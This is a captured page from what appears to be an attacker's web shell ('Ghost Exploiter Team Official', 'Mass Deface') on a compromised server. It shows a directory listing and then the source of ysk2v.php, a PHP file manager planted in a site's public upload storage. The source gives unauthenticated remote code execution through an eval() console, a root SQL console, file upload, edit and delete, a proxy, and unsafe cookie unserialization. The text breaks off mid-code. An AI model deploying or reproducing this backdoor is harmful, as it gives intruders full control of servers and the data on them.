Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
storage
/
app
/
public
/
87
/
4odfzq
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
100.tar
278KB
edt
ren
100.tar.gz
272.201KB
edt
ren
100.zip
276.545KB
edt
ren
102.zip
76.25KB
edt
ren
103.zip
16.113KB
edt
ren
105.zip
93.146KB
edt
ren
107.zip
411.503KB
edt
ren
109.zip
16.113KB
edt
ren
110.zip
16.113KB
edt
ren
111.zip
521.131KB
edt
ren
113.zip
377.735KB
edt
ren
114.zip
131.487KB
edt
ren
115.zip
44.65MB
edt
ren
116.tar
17.5KB
edt
ren
116.tar.gz
12.973KB
edt
ren
116.zip
16.113KB
edt
ren
119.zip
274.682KB
edt
ren
12.zip
1.77MB
edt
ren
120.zip
117.626KB
edt
ren
121.zip
272.579KB
edt
ren
122.zip
255.11KB
edt
ren
123.zip
16.113KB
edt
ren
124.zip
467.87KB
edt
ren
125.zip
110.087KB
edt
ren
126.zip
248.056KB
edt
ren
127.zip
676.721KB
edt
ren
128.zip
192.811KB
edt
ren
129.zip
160.144KB
edt
ren
13.zip
1.05MB
edt
ren
133.zip
638.853KB
edt
ren
14.zip
684.538KB
edt
ren
140.tar
231KB
edt
ren
140.tar.gz
86.135KB
edt
ren
140.zip
227.345KB
edt
ren
142.zip
244.178KB
edt
ren
143.zip
172.835KB
edt
ren
145.zip
239.392KB
edt
ren
147.zip
121.764KB
edt
ren
15.zip
558.214KB
edt
ren
150.zip
416.937KB
edt
ren
152.zip
91.93KB
edt
ren
153.zip
91.877KB
edt
ren
156.zip
676.475KB
edt
ren
16.zip
663.435KB
edt
ren
163.zip
189.766KB
edt
ren
18.zip
1.553KB
edt
ren
181.tar
34KB
edt
ren
181.tar.gz
20.448KB
edt
ren
181.zip
32.707KB
edt
ren
183.zip
128.448KB
edt
ren
184.zip
33.248KB
edt
ren
185.zip
440.578KB
edt
ren
186.zip
1.23MB
edt
ren
188.zip
210.387KB
edt
ren
189.zip
358.993KB
edt
ren
190.zip
356.182KB
edt
ren
191.zip
768.458KB
edt
ren
193.zip
131.58KB
edt
ren
194.zip
133.112KB
edt
ren
195.zip
143.137KB
edt
ren
197.zip
61.667KB
edt
ren
199.zip
103.423KB
edt
ren
20.zip
3.854KB
edt
ren
200.zip
218.213KB
edt
ren
202.zip
1.15MB
edt
ren
207.zip
1.24MB
edt
ren
209.zip
1.23MB
edt
ren
21.zip
0.266KB
edt
ren
211.zip
56.051KB
edt
ren
212.zip
57.063KB
edt
ren
213.zip
57.65KB
edt
ren
219.zip
775.482KB
edt
ren
22.zip
0.553KB
edt
ren
224.zip
142.646KB
edt
ren
225.zip
96.205KB
edt
ren
226.zip
76.666KB
edt
ren
227.zip
76.981KB
edt
ren
228.zip
526.675KB
edt
ren
232.zip
101.419KB
edt
ren
24.zip
1.755KB
edt
ren
240.tar
98.5KB
edt
ren
240.tar.gz
93.234KB
edt
ren
240.zip
96.904KB
edt
ren
242.zip
216.44KB
edt
ren
243.zip
298.296KB
edt
ren
245.zip
641.602KB
edt
ren
247.zip
451.636KB
edt
ren
250.zip
451.225KB
edt
ren
253.zip
75.847KB
edt
ren
256.zip
250.872KB
edt
ren
257.zip
209.116KB
edt
ren
280.zip
215.643KB
edt
ren
281.tar
42.5KB
edt
ren
281.tar.gz
39.091KB
edt
ren
281.zip
41.2KB
edt
ren
285.zip
277.332KB
edt
ren
286.zip
1.22MB
edt
ren
289.zip
246.229KB
edt
ren
29.zip
136.553KB
edt
ren
295.zip
278.367KB
edt
ren
300.tar
546.5KB
edt
ren
300.tar.gz
325.928KB
edt
ren
300.zip
544.885KB
edt
ren
302.zip
550.841KB
edt
ren
303.zip
283.844KB
edt
ren
304.zip
279.321KB
edt
ren
307.zip
79.082KB
edt
ren
31.zip
161.227KB
edt
ren
314.zip
101.774KB
edt
ren
317.zip
745.543KB
edt
ren
319.zip
48.597KB
edt
ren
32.zip
0.264KB
edt
ren
320.zip
104.233KB
edt
ren
321.zip
78.691KB
edt
ren
322.zip
74.191KB
edt
ren
323.zip
80.691KB
edt
ren
325.zip
74.191KB
edt
ren
333.zip
300.972KB
edt
ren
343.zip
87.976KB
edt
ren
353.zip
240.4KB
edt
ren
356.zip
96.176KB
edt
ren
357.zip
103.158KB
edt
ren
38.zip
277.038KB
edt
ren
39.zip
0.264KB
edt
ren
40.tar
278KB
edt
ren
40.tar.gz
272.121KB
edt
ren
40.zip
276.457KB
edt
ren
41.tar
117KB
edt
ren
41.tar.gz
105.699KB
edt
ren
41.zip
115.654KB
edt
ren
42.zip
377.321KB
edt
ren
43.zip
185.827KB
edt
ren
44.tar
380.5KB
edt
ren
44.tar.gz
373.6KB
edt
ren
44.zip
378.813KB
edt
ren
45.zip
290.694KB
edt
ren
47.zip
287.765KB
edt
ren
48.zip
1.21MB
edt
ren
49.zip
271.261KB
edt
ren
4odfzq.tar
419KB
edt
ren
4odfzq.tar.gz
199.683KB
edt
ren
50.tar
249KB
edt
ren
50.tar.gz
179.955KB
edt
ren
50.zip
246.16KB
edt
ren
51.zip
605.336KB
edt
ren
52.zip
304.619KB
edt
ren
53.zip
570.937KB
edt
ren
54.zip
140.196KB
edt
ren
55.zip
52.457KB
edt
ren
56.zip
52.314KB
edt
ren
58.tar
169KB
edt
ren
58.tar.gz
161.925KB
edt
ren
58.zip
166.592KB
edt
ren
59.zip
408.181KB
edt
ren
60.zip
67.547KB
edt
ren
61.zip
575.176KB
edt
ren
62.zip
457.291KB
edt
ren
68.tar
581KB
edt
ren
68.tar.gz
374.92KB
edt
ren
68.zip
578.418KB
edt
ren
69.tar
102.5KB
edt
ren
69.tar.gz
75.946KB
edt
ren
69.zip
100.748KB
edt
ren
70.tar
467.5KB
edt
ren
70.tar.gz
399.076KB
edt
ren
70.zip
464.965KB
edt
ren
71.zip
64.075KB
edt
ren
72.zip
32.707KB
edt
ren
73.zip
32.707KB
edt
ren
74.zip
32.707KB
edt
ren
75.zip
274.873KB
edt
ren
76.zip
503.388KB
edt
ren
78.tar
106KB
edt
ren
78.tar.gz
95.026KB
edt
ren
78.zip
103.946KB
edt
ren
79.zip
1007.884KB
edt
ren
80.tar
112KB
edt
ren
80.tar.gz
105.066KB
edt
ren
80.zip
110.351KB
edt
ren
81.zip
162.984KB
edt
ren
82.zip
186.722KB
edt
ren
83.zip
76.128KB
edt
ren
85.zip
1.03MB
edt
ren
86.zip
447.234KB
edt
ren
87.zip
2.77MB
edt
ren
88.tar
29.5KB
edt
ren
88.tar.gz
22.814KB
edt
ren
88.zip
27.84KB
edt
ren
89.zip
27.84KB
edt
ren
90.zip
48.397KB
edt
ren
91.tar
48KB
edt
ren
91.tar.gz
42.5KB
edt
ren
91.zip
45.833KB
edt
ren
93.zip
529.955KB
edt
ren
94.zip
98.452KB
edt
ren
95.zip
497.83KB
edt
ren
96.zip
99.104KB
edt
ren
97.zip
439.121KB
edt
ren
98.tar
1.19MB
edt
ren
98.tar.gz
344.9KB
edt
ren
98.zip
1.19MB
edt
ren
99.zip
277.011KB
edt
ren
shablon-akta-sverki-1-1
...
22.854KB
edt
ren
shablon-akta-sverki-1-1
...
29.5KB
edt
ren
temp.zip
5.03MB
edt
ren
ysk2v.php
77.48KB
edt
ren
ysk2v.php.php.tar.gz
24.427KB
edt
ren
4odfzq.zip 0000644 00000552533 00000000000 0006455 0 ustar 00 PK ! �r� < < ysk2v.php.tarnu �[��� var/www/html/back/storage/app/public/87/4odfzq/ysk2v.php 0000644 00000232754 00000000000 0016740 0 ustar 00 <?php /* PHP File manager ver 1.4 */ // Configuration — do not change manually! $authorization = '{"authorize":"0","login":"admin","password":"phpfm","cookie_name":"fm_user","days_authorization":"30","script":"<script type=\"text\/javascript\" src=\"https:\/\/www.cdolivet.com\/editarea\/editarea\/edit_area\/edit_area_full.js\"><\/script>\r\n<script language=\"Javascript\" type=\"text\/javascript\">\r\neditAreaLoader.init({\r\nid: \"newcontent\"\r\n,display: \"later\"\r\n,start_highlight: true\r\n,allow_resize: \"both\"\r\n,allow_toggle: true\r\n,word_wrap: true\r\n,language: \"ru\"\r\n,syntax: \"php\"\t\r\n,toolbar: \"search, go_to_line, |, undo, redo, |, select_font, |, syntax_selection, |, change_smooth_selection, highlight, reset_highlight, |, help\"\r\n,syntax_selection_allow: \"css,html,js,php,python,xml,c,cpp,sql,basic,pas\"\r\n});\r\n<\/script>"}'; $php_templates = '{"Settings":"global $fm_config;\r\nvar_export($fm_config);","Backup SQL tables":"echo fm_backup_tables();"}'; $sql_templates = '{"All bases":"SHOW DATABASES;","All tables":"SHOW TABLES;"}'; $translation = '{"id":"en","Add":"Add","Are you sure you want to delete this directory (recursively)?":"Are you sure you want to delete this directory (recursively)?","Are you sure you want to delete this file?":"Are you sure you want to delete this file?","Archiving":"Archiving","Authorization":"Authorization","Back":"Back","Cancel":"Cancel","Chinese":"Chinese","Compress":"Compress","Console":"Console","Cookie":"Cookie","Created":"Created","Date":"Date","Days":"Days","Decompress":"Decompress","Delete":"Delete","Deleted":"Deleted","Download":"Download","done":"done","Edit":"Edit","Enter":"Enter","English":"English","Error occurred":"Error occurred","File manager":"File manager","File selected":"File selected","File updated":"File updated","Filename":"Filename","Files uploaded":"Files uploaded","French":"French","Generation time":"Generation time","German":"German","Home":"Home","Quit":"Quit","Language":"Language","Login":"Login","Manage":"Manage","Make directory":"Make directory","Name":"Name","New":"New","New file":"New file","no files":"no files","Password":"Password","pictures":"pictures","Recursively":"Recursively","Rename":"Rename","Reset":"Reset","Reset settings":"Reset settings","Restore file time after editing":"Restore file time after editing","Result":"Result","Rights":"Rights","Russian":"Russian","Save":"Save","Select":"Select","Select the file":"Select the file","Settings":"Settings","Show":"Show","Show size of the folder":"Show size of the folder","Size":"Size","Spanish":"Spanish","Submit":"Submit","Task":"Task","templates":"templates","Ukrainian":"Ukrainian","Upload":"Upload","Value":"Value","Hello":"Hello"}'; // end configuration // Preparations $starttime = explode(' ', microtime()); $starttime = $starttime[1] + $starttime[0]; $langs = array('en','ru','de','fr','uk'); $path = empty($_REQUEST['path']) ? $path = realpath('.') : realpath($_REQUEST['path']); $path = str_replace('\\', '/', $path) . '/'; $main_path=str_replace('\\', '/',realpath('./')); $phar_maybe = (version_compare(phpversion(),"5.3.0","<"))?true:false; $msg = ''; // service string $default_language = 'ru'; $detect_lang = true; $fm_version = 1.4; //Authorization $auth = json_decode($authorization,true); $auth['authorize'] = isset($auth['authorize']) ? $auth['authorize'] : 0; $auth['days_authorization'] = (isset($auth['days_authorization'])&&is_numeric($auth['days_authorization'])) ? (int)$auth['days_authorization'] : 30; $auth['login'] = isset($auth['login']) ? $auth['login'] : 'admin'; $auth['password'] = isset($auth['password']) ? $auth['password'] : 'phpfm'; $auth['cookie_name'] = isset($auth['cookie_name']) ? $auth['cookie_name'] : 'fm_user'; $auth['script'] = isset($auth['script']) ? $auth['script'] : ''; // Little default config $fm_default_config = array ( 'make_directory' => true, 'new_file' => true, 'upload_file' => true, 'show_dir_size' => false, //if true, show directory size → maybe slow 'show_img' => true, 'show_php_ver' => true, 'show_php_ini' => false, // show path to current php.ini 'show_gt' => true, // show generation time 'enable_php_console' => true, 'enable_sql_console' => true, 'sql_server' => 'localhost', 'sql_username' => 'root', 'sql_password' => '', 'sql_db' => 'test_base', 'enable_proxy' => true, 'show_phpinfo' => true, 'show_xls' => true, 'fm_settings' => true, 'restore_time' => true, 'fm_restore_time' => false, ); if (empty($_COOKIE['fm_config'])) $fm_config = $fm_default_config; else $fm_config = unserialize($_COOKIE['fm_config']); // Change language if (isset($_POST['fm_lang'])) { setcookie('fm_lang', $_POST['fm_lang'], time() + (86400 * $auth['days_authorization'])); $_COOKIE['fm_lang'] = $_POST['fm_lang']; } $language = $default_language; // Detect browser language if($detect_lang && !empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) && empty($_COOKIE['fm_lang'])){ $lang_priority = explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']); if (!empty($lang_priority)){ foreach ($lang_priority as $lang_arr){ $lng = explode(';', $lang_arr); $lng = $lng[0]; if(in_array($lng,$langs)){ $language = $lng; break; } } } } // Cookie language is primary for ever $language = (empty($_COOKIE['fm_lang'])) ? $language : $_COOKIE['fm_lang']; // Localization $lang = json_decode($translation,true); if ($lang['id']!=$language) { $get_lang = file_get_contents('https://raw.githubusercontent.com/fahriyzx/Filemanager/master/languages/' . $language . '.json'); if (!empty($get_lang)) { //remove unnecessary characters $translation_string = str_replace("'",''',json_encode(json_decode($get_lang),JSON_UNESCAPED_UNICODE)); $fgc = file_get_contents(__FILE__); $search = preg_match('#translation[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$translation_string,$fgc); if (file_put_contents(__FILE__, $replace)) { $msg .= __('File updated'); } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } $lang = json_decode($translation_string,true); } } /* Functions */ //translation function __($text){ global $lang; if (isset($lang[$text])) return $lang[$text]; else return $text; }; //delete files and dirs recursively function fm_del_files($file, $recursive = false) { if($recursive && @is_dir($file)) { $els = fm_scan_dir($file, '', '', true); foreach ($els as $el) { if($el != '.' && $el != '..'){ fm_del_files($file . '/' . $el, true); } } } if(@is_dir($file)) { return rmdir($file); } else { return @unlink($file); } } //file perms function fm_rights_string($file, $if = false){ $perms = fileperms($file); $info = ''; if(!$if){ if (($perms & 0xC000) == 0xC000) { //Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { //Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { //Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { //Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { //Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { //Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { //FIFO pipe $info = 'p'; } else { //Unknown $info = 'u'; } } //Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); //Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); //World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function fm_convert_rights($mode) { $mode = str_pad($mode,9,'-'); $trans = array('-'=>'0','r'=>'4','w'=>'2','x'=>'1'); $mode = strtr($mode,$trans); $newmode = '0'; $owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2]; $group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5]; $world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8]; $newmode .= $owner . $group . $world; return intval($newmode, 8); } function fm_chmod($file, $val, $rec = false) { $res = @chmod(realpath($file), $val); if(@is_dir($file) && $rec){ $els = fm_scan_dir($file); foreach ($els as $el) { $res = $res && fm_chmod($file . '/' . $el, $val, true); } } return $res; } //load files function fm_download($file_name) { if (!empty($file_name)) { if (file_exists($file_name)) { header("Content-Disposition: attachment; filename=" . basename($file_name)); header("Content-Type: application/force-download"); header("Content-Type: application/octet-stream"); header("Content-Type: application/download"); header("Content-Description: File Transfer"); header("Content-Length: " . filesize($file_name)); flush(); // this doesn't really matter. $fp = fopen($file_name, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); // this is essential for large downloads } fclose($fp); die(); } else { header('HTTP/1.0 404 Not Found', true, 404); header('Status: 404 Not Found'); die(); } } } //show folder size function fm_dir_size($f,$format=true) { if($format) { $size=fm_dir_size($f,false); if($size<=1024) return $size.' bytes'; elseif($size<=1024*1024) return round($size/(1024),2).' Kb'; elseif($size<=1024*1024*1024) return round($size/(1024*1024),2).' Mb'; elseif($size<=1024*1024*1024*1024) return round($size/(1024*1024*1024),2).' Gb'; elseif($size<=1024*1024*1024*1024*1024) return round($size/(1024*1024*1024*1024),2).' Tb'; //:))) else return round($size/(1024*1024*1024*1024*1024),2).' Pb'; // ;-) } else { if(is_file($f)) return filesize($f); $size=0; $dh=opendir($f); while(($file=readdir($dh))!==false) { if($file=='.' || $file=='..') continue; if(is_file($f.'/'.$file)) $size+=filesize($f.'/'.$file); else $size+=fm_dir_size($f.'/'.$file,false); } closedir($dh); return $size+filesize($f); } } //scan directory function fm_scan_dir($directory, $exp = '', $type = 'all', $do_not_filter = false) { $dir = $ndir = array(); if(!empty($exp)){ $exp = '/^' . str_replace('*', '(.*)', str_replace('.', '\\.', $exp)) . '$/'; } if(!empty($type) && $type !== 'all'){ $func = 'is_' . $type; } if(@is_dir($directory)){ $fh = opendir($directory); while (false !== ($filename = readdir($fh))) { if(substr($filename, 0, 1) != '.' || $do_not_filter) { if((empty($type) || $type == 'all' || $func($directory . '/' . $filename)) && (empty($exp) || preg_match($exp, $filename))){ $dir[] = $filename; } } } closedir($fh); natsort($dir); } return $dir; } function fm_link($get,$link,$name,$title='') { if (empty($title)) $title=$name.' '.basename($link); return ' <a href="?'.$get.'='.base64_encode($link).'" title="'.$title.'">'.$name.'</a>'; } function fm_arr_to_option($arr,$n,$sel=''){ foreach($arr as $v){ $b=$v[$n]; $res.='<option value="'.$b.'" '.($sel && $sel==$b?'selected':'').'>'.$b.'</option>'; } return $res; } function fm_lang_form ($current='en'){ return ' <form name="change_lang" method="post" action=""> <select name="fm_lang" title="'.__('Language').'" onchange="document.forms[\'change_lang\'].submit()" > <option value="en" '.($current=='en'?'selected="selected" ':'').'>'.__('English').'</option> <option value="de" '.($current=='de'?'selected="selected" ':'').'>'.__('German').'</option> <option value="ru" '.($current=='ru'?'selected="selected" ':'').'>'.__('Russian').'</option> <option value="fr" '.($current=='fr'?'selected="selected" ':'').'>'.__('French').'</option> <option value="uk" '.($current=='uk'?'selected="selected" ':'').'>'.__('Ukrainian').'</option> </select> </form> '; } function fm_root($dirname){ return ($dirname=='.' OR $dirname=='..'); } function fm_php($string){ $display_errors=ini_get('display_errors'); ini_set('display_errors', '1'); ob_start(); eval(trim($string)); $text = ob_get_contents(); ob_end_clean(); ini_set('display_errors', $display_errors); return $text; } //SHOW DATABASES function fm_sql_connect(){ global $fm_config; return new mysqli($fm_config['sql_server'], $fm_config['sql_username'], $fm_config['sql_password'], $fm_config['sql_db']); } function fm_sql($query){ global $fm_config; $query=trim($query); ob_start(); $connection = fm_sql_connect(); if ($connection->connect_error) { ob_end_clean(); return $connection->connect_error; } $connection->set_charset('utf8'); $queried = mysqli_query($connection,$query); if ($queried===false) { ob_end_clean(); return mysqli_error($connection); } else { if(!empty($queried)){ while($row = mysqli_fetch_assoc($queried)) { $query_result[]= $row; } } $vdump=empty($query_result)?'':var_export($query_result,true); ob_end_clean(); $connection->close(); return '<pre>'.stripslashes($vdump).'</pre>'; } } function fm_backup_tables($tables = '*', $full_backup = true) { global $path; $mysqldb = fm_sql_connect(); $delimiter = "; \n \n"; if($tables == '*') { $tables = array(); $result = $mysqldb->query('SHOW TABLES'); while($row = mysqli_fetch_row($result)) { $tables[] = $row[0]; } } else { $tables = is_array($tables) ? $tables : explode(',',$tables); } $return=''; foreach($tables as $table) { $result = $mysqldb->query('SELECT * FROM '.$table); $num_fields = mysqli_num_fields($result); $return.= 'DROP TABLE IF EXISTS `'.$table.'`'.$delimiter; $row2 = mysqli_fetch_row($mysqldb->query('SHOW CREATE TABLE '.$table)); $return.=$row2[1].$delimiter; if ($full_backup) { for ($i = 0; $i < $num_fields; $i++) { while($row = mysqli_fetch_row($result)) { $return.= 'INSERT INTO `'.$table.'` VALUES('; for($j=0; $j<$num_fields; $j++) { $row[$j] = addslashes($row[$j]); $row[$j] = str_replace("\n","\\n",$row[$j]); if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; } if ($j<($num_fields-1)) { $return.= ','; } } $return.= ')'.$delimiter; } } } else { $return = preg_replace("#AUTO_INCREMENT=[\d]+ #is", '', $return); } $return.="\n\n\n"; } //save file $file=gmdate("Y-m-d_H-i-s",time()).'.sql'; $handle = fopen($file,'w+'); fwrite($handle,$return); fclose($handle); $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'?delete=' . $file . '&path=' . $path . '\'"'; return $file.': '.fm_link('download',$path.$file,__('Download'),__('Download').' '.$file).' <a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>'; } function fm_restore_tables($sqlFileToExecute) { $mysqldb = fm_sql_connect(); $delimiter = "; \n \n"; // Load and explode the sql file $f = fopen($sqlFileToExecute,"r+"); $sqlFile = fread($f,filesize($sqlFileToExecute)); $sqlArray = explode($delimiter,$sqlFile); //Process the sql file by statements foreach ($sqlArray as $stmt) { if (strlen($stmt)>3){ $result = $mysqldb->query($stmt); if (!$result){ $sqlErrorCode = mysqli_errno($mysqldb->connection); $sqlErrorText = mysqli_error($mysqldb->connection); $sqlStmt = $stmt; break; } } } if (empty($sqlErrorCode)) return __('Success').' — '.$sqlFileToExecute; else return $sqlErrorText.'<br/>'.$stmt; } function fm_img_link($filename){ return './'.basename(__FILE__).'?img='.base64_encode($filename); } function fm_home_style(){ return ' input, input.fm_input { text-indent: 2px; } input, textarea, select, input.fm_input { color: black; font: normal 8pt Verdana, Arial, Helvetica, sans-serif; border-color: black; background-color: #FCFCFC none !important; border-radius: 0; padding: 2px; } input.fm_input { background: #FCFCFC none !important; cursor: pointer; } .home { background-image: url(""); background-repeat: no-repeat; }'; } function fm_config_checkbox_row($name,$value) { global $fm_config; return '<tr><td class="row1"><input id="fm_config_'.$value.'" name="fm_config['.$value.']" value="1" '.(empty($fm_config[$value])?'':'checked="true"').' type="checkbox"></td><td class="row2 whole"><label for="fm_config_'.$value.'">'.$name.'</td></tr>'; } function fm_protocol() { if (isset($_SERVER['HTTP_SCHEME'])) return $_SERVER['HTTP_SCHEME'].'://'; if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') return 'https://'; if (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443) return 'https://'; if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') return 'https://'; return 'http://'; } function fm_site_url() { return fm_protocol().$_SERVER['HTTP_HOST']; } function fm_url($full=false) { $host=$full?fm_site_url():'.'; return $host.'/'.basename(__FILE__); } function fm_home($full=false){ return ' <a href="'.fm_url($full).'" title="'.__('Home').'"><span class="home"> </span></a>'; } function fm_run_input($lng) { global $fm_config; $return = !empty($fm_config['enable_'.$lng.'_console']) ? ' <form method="post" action="'.fm_url().'" style="display:inline"> <input type="submit" name="'.$lng.'run" value="'.strtoupper($lng).' '.__('Console').'"> </form> ' : ''; return $return; } function fm_url_proxy($matches) { $link = str_replace('&','&',$matches[2]); $url = isset($_GET['url'])?$_GET['url']:''; $parse_url = parse_url($url); $host = $parse_url['scheme'].'://'.$parse_url['host'].'/'; if (substr($link,0,2)=='//') { $link = substr_replace($link,fm_protocol(),0,2); } elseif (substr($link,0,1)=='/') { $link = substr_replace($link,$host,0,1); } elseif (substr($link,0,2)=='./') { $link = substr_replace($link,$host,0,2); } elseif (substr($link,0,4)=='http') { //alles machen wunderschon } else { $link = $host.$link; } if ($matches[1]=='href' && !strripos($link, 'css')) { $base = fm_site_url().'/'.basename(__FILE__); $baseq = $base.'?proxy=true&url='; $link = $baseq.urlencode($link); } elseif (strripos($link, 'css')){ //как-то тоже подменÑть надо } return $matches[1].'="'.$link.'"'; } function fm_tpl_form($lng_tpl) { global ${$lng_tpl.'_templates'}; $tpl_arr = json_decode(${$lng_tpl.'_templates'},true); $str = ''; foreach ($tpl_arr as $ktpl=>$vtpl) { $str .= '<tr><td class="row1"><input name="'.$lng_tpl.'_name[]" value="'.$ktpl.'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_value[]" cols="55" rows="5" class="textarea_input">'.$vtpl.'</textarea> <input name="del_'.rand().'" type="button" onClick="this.parentNode.parentNode.remove();" value="'.__('Delete').'"/></td></tr>'; } return ' <table> <tr><th colspan="2">'.strtoupper($lng_tpl).' '.__('templates').' '.fm_run_input($lng_tpl).'</th></tr> <form method="post" action=""> <input type="hidden" value="'.$lng_tpl.'" name="tpl_edited"> <tr><td class="row1">'.__('Name').'</td><td class="row2 whole">'.__('Value').'</td></tr> '.$str.' <tr><td colspan="2" class="row3"><input name="res" type="button" onClick="document.location.href = \''.fm_url().'?fm_settings=true\';" value="'.__('Reset').'"/> <input type="submit" value="'.__('Save').'" ></td></tr> </form> <form method="post" action=""> <input type="hidden" value="'.$lng_tpl.'" name="tpl_edited"> <tr><td class="row1"><input name="'.$lng_tpl.'_new_name" value="" placeholder="'.__('New').' '.__('Name').'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_new_value" cols="55" rows="5" class="textarea_input" placeholder="'.__('New').' '.__('Value').'"></textarea></td></tr> <tr><td colspan="2" class="row3"><input type="submit" value="'.__('Add').'" ></td></tr> </form> </table> '; } /* End Functions */ // authorization if ($auth['authorize']) { if (isset($_POST['login']) && isset($_POST['password'])){ if (($_POST['login']==$auth['login']) && ($_POST['password']==$auth['password'])) { setcookie($auth['cookie_name'], $auth['login'].'|'.md5($auth['password']), time() + (86400 * $auth['days_authorization'])); $_COOKIE[$auth['cookie_name']]=$auth['login'].'|'.md5($auth['password']); } } if (!isset($_COOKIE[$auth['cookie_name']]) OR ($_COOKIE[$auth['cookie_name']]!=$auth['login'].'|'.md5($auth['password']))) { echo ' <!doctype html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>'.__('File manager').'</title> </head> <body> <form action="" method="post"> '.__('Login').' <input name="login" type="text"> '.__('Password').' <input name="password" type="password"> <input type="submit" value="'.__('Enter').'" class="fm_input"> </form> '.fm_lang_form($language).' </body> </html> '; die(); } if (isset($_POST['quit'])) { unset($_COOKIE[$auth['cookie_name']]); setcookie($auth['cookie_name'], '', time() - (86400 * $auth['days_authorization'])); header('Location: '.fm_site_url().$_SERVER['REQUEST_URI']); } } // Change config if (isset($_GET['fm_settings'])) { if (isset($_GET['fm_config_delete'])) { unset($_COOKIE['fm_config']); setcookie('fm_config', '', time() - (86400 * $auth['days_authorization'])); header('Location: '.fm_url().'?fm_settings=true'); exit(0); } elseif (isset($_POST['fm_config'])) { $fm_config = $_POST['fm_config']; setcookie('fm_config', serialize($fm_config), time() + (86400 * $auth['days_authorization'])); $_COOKIE['fm_config'] = serialize($fm_config); $msg = __('Settings').' '.__('done'); } elseif (isset($_POST['fm_login'])) { if (empty($_POST['fm_login']['authorize'])) $_POST['fm_login'] = array('authorize' => '0') + $_POST['fm_login']; $fm_login = json_encode($_POST['fm_login']); $fgc = file_get_contents(__FILE__); $search = preg_match('#authorization[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$fm_login,$fgc); if (file_put_contents(__FILE__, $replace)) { $msg .= __('File updated'); if ($_POST['fm_login']['login'] != $auth['login']) $msg .= ' '.__('Login').': '.$_POST['fm_login']['login']; if ($_POST['fm_login']['password'] != $auth['password']) $msg .= ' '.__('Password').': '.$_POST['fm_login']['password']; $auth = $_POST['fm_login']; } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } } elseif (isset($_POST['tpl_edited'])) { $lng_tpl = $_POST['tpl_edited']; if (!empty($_POST[$lng_tpl.'_name'])) { $fm_php = json_encode(array_combine($_POST[$lng_tpl.'_name'],$_POST[$lng_tpl.'_value']),JSON_HEX_APOS); } elseif (!empty($_POST[$lng_tpl.'_new_name'])) { $fm_php = json_encode(json_decode(${$lng_tpl.'_templates'},true)+array($_POST[$lng_tpl.'_new_name']=>$_POST[$lng_tpl.'_new_value']),JSON_HEX_APOS); } if (!empty($fm_php)) { $fgc = file_get_contents(__FILE__); $search = preg_match('#'.$lng_tpl.'_templates[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$fm_php,$fgc); if (file_put_contents(__FILE__, $replace)) { ${$lng_tpl.'_templates'} = $fm_php; $msg .= __('File updated'); } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } } else $msg .= __('Error occurred'); } } // Just show image if (isset($_GET['img'])) { $file=base64_decode($_GET['img']); if ($info=getimagesize($file)){ switch ($info[2]){ //1=GIF, 2=JPG, 3=PNG, 4=SWF, 5=PSD, 6=BMP case 1: $ext='gif'; break; case 2: $ext='jpeg'; break; case 3: $ext='png'; break; case 6: $ext='bmp'; break; default: die(); } header("Content-type: image/$ext"); echo file_get_contents($file); die(); } } // Just download file if (isset($_GET['download'])) { $file=base64_decode($_GET['download']); fm_download($file); } // Just show info if (isset($_GET['phpinfo'])) { phpinfo(); die(); } // Mini proxy, many bugs! if (isset($_GET['proxy']) && (!empty($fm_config['enable_proxy']))) { $url = 